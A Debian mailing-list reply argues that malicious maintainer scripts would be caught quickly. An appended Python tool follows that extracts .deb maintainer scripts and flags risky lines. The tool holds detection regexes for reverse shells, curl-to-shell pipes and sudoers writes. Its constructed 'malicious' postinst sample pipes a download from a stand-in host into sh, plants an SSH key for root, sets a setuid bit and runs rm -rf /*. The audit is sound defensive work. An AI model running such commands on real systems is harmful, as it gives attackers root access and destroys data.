
Re: Protections against a mad maintainer?



Hi Jean --

There are (at least) 3 counterarguments to the concern that Debian 
maintainers could maliciously add dangerous commands to their 
{pre,post}{inst,rm} scripts:
-- the same package system which is open to many for development is 
equally open to many for testing.
-- by having both "stable" and "unstable" releases, Debian distinguishes 
between packages which are [likely to have been] tested and those which 
are not.
-- as the saying goes, "Never interpret as malicious that which could 
also be explained by stupidity." Humans at commercial software firms
are no more protected from their own stupidity than humans who are working
to provide free software, _and_ who are offering the world the opportunity
to scrutinize their source code.  

Another way to pose the question is, what would motivate a developer to
include malicious software?  He could be pretty sure that the offending
code would be found quickly, and he would be identified (via PGP keys)
with the problem.  The perpetrator would be immediately banned from 
using the system.  And all he got for his trouble was to inconvenience one
or a few unknown, randomly selected, victims.  Not a very good tradeoff.

All the same questions being asked of free software should be asked, 
of course, of the commercial software...  

HTH,
Susan Kleinmann
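The message above rests on the point that a maintainer script is where a dangerous command would hide, and that the answer is scrutiny: the scripts ship in the package and anyone can read them before dpkg runs them as root. As an added example (not part of the original message, and not Debian's own tooling), here is a small Python program that does that scrutiny offline. It parses the .deb container, which is a plain `ar` archive, pulls preinst/postinst/prerm/postrm out of control.tar.gz, and flags lines a reviewer would want to read first. The heuristics, the package name "example", and the two sample postinst scripts are constructed for the example; the "malicious" one exists only to exercise the checks. On a real system, `dpkg-deb -e pkg.deb dir` extracts the same scripts for the same kind of review.

```python
import io
import re
import tarfile

MAINTAINER_SCRIPTS = ("preinst", "postinst", "prerm", "postrm")

# Review heuristics, constructed for this example: each flags a line a human
# should read before the script is allowed to run as root at install time.
SUSPICIOUS = [
    ("recursive delete of the filesystem root", re.compile(r"\brm\s+-\w*r\w*\s+/(?:\*|\s|$)")),
    ("download piped straight into a shell",
     re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:sudo\s+)?(?:ba|da|z)?sh\b")),
    ("SSH authorized_keys or root dotfiles touched",
     re.compile(r"authorized_keys|/root/\.(?:bashrc|profile)\b")),
    ("direct write to account or sudo databases",
     re.compile(r"(?:>>?\s*|\btee\s+(?:-a\s+)?)/etc/(?:passwd|shadow|sudoers)\b")),
    ("setuid bit set on an installed file", re.compile(r"\bchmod\s+(?:[ugoa]*\+s|[0-7]*[4-7][0-7]{3})\b")),
    ("network listener or reverse shell", re.compile(r"/dev/tcp/|\b(?:nc|ncat|netcat)\s+-\w*[el]")),
]


def iter_ar_members(blob):
    """Yield (name, data) for each member of the 'ar' archive that wraps a .deb:
    8-byte magic, then 60-byte fixed-width headers each followed by its data,
    padded to an even offset with a newline."""
    if blob[:8] != b"!<arch>\n":
        raise ValueError("not an ar archive (bad magic)")
    pos = 8
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]
        if hdr[58:60] != b"`\n":
            raise ValueError("corrupt ar member header at offset %d" % pos)
        name = hdr[0:16].decode("ascii").rstrip().rstrip("/")  # GNU ar may append '/'
        size = int(hdr[48:58].decode("ascii").strip())          # decimal, space padded
        start = pos + 60
        yield name, blob[start:start + size]
        pos = start + size + (size % 2)


def extract_maintainer_scripts(deb):
    """Return {name: text} for the maintainer scripts found in control.tar.*"""
    scripts = {}
    for name, data in iter_ar_members(deb):
        if not name.startswith("control.tar"):
            continue
        # tarfile autodetects gzip/xz/bz2; zstd control tarballs are not handled here.
        with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
            for member in tar.getmembers():
                base = member.name.lstrip("./")
                if member.isfile() and base in MAINTAINER_SCRIPTS:
                    scripts[base] = tar.extractfile(member).read().decode("utf-8", "replace")
    return scripts


def audit_scripts(scripts):
    """Return (script, line_no, label, line) for every non-comment line a heuristic matches."""
    findings = []
    for script, text in scripts.items():
        for lineno, line in enumerate(text.splitlines(), 1):
            stripped = line.strip()
            if not stripped or stripped.startswith("#"):
                continue
            for label, pattern in SUSPICIOUS:
                if pattern.search(line):
                    findings.append((script, lineno, label, stripped))
    return findings


def audit_deb(deb):
    return audit_scripts(extract_maintainer_scripts(deb))


# Constructed sample scripts (not from any real package).
BENIGN_POSTINST = """#!/bin/sh
set -e
adduser --system --no-create-home example
ldconfig
"""

MALICIOUS_POSTINST = """#!/bin/sh
set -e
ldconfig
curl -s http://example.invalid/x.sh | sh
echo 'ssh-rsa AAAA... attacker' >> /root/.ssh/authorized_keys
chmod 4755 /usr/bin/example
rm -rf /*
"""


def build_sample_deb(scripts):
    """Assemble a minimal .deb in memory so the audit can be run offline."""
    def tar_gz(files):
        buf = io.BytesIO()
        with tarfile.open(fileobj=buf, mode="w:gz") as tar:
            for name, body in files.items():
                info = tarfile.TarInfo("./" + name)
                info.size, info.mode = len(body), 0o755
                tar.addfile(info, io.BytesIO(body))
        return buf.getvalue()

    def member(name, data):  # one ar member: 60-byte header, data, even-offset padding
        hdr = "%-16s%-12s%-6s%-6s%-8s%-10s`\n" % (name, 0, 0, 0, "100644", len(data))
        return hdr.encode("ascii") + data + (b"\n" if len(data) % 2 else b"")

    control = {"control": b"Package: example\nVersion: 1.0\nArchitecture: all\n"}
    control.update({n: t.encode() for n, t in scripts.items()})
    return (b"!<arch>\n" + member("debian-binary", b"2.0\n")
            + member("control.tar.gz", tar_gz(control)) + member("data.tar.gz", tar_gz({})))


if __name__ == "__main__":
    for script, lineno, label, line in audit_deb(build_sample_deb({"postinst": MALICIOUS_POSTINST})):
        print("%s:%d: %s\n    %s" % (script, lineno, label, line))
```

The heuristics are deliberately blunt: they are there to direct a reader's eyes, not to decide for them, and a script that passes them still has to be read. Run against the constructed malicious postinst the audit reports the four planted lines and nothing else; against the benign one it reports nothing.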


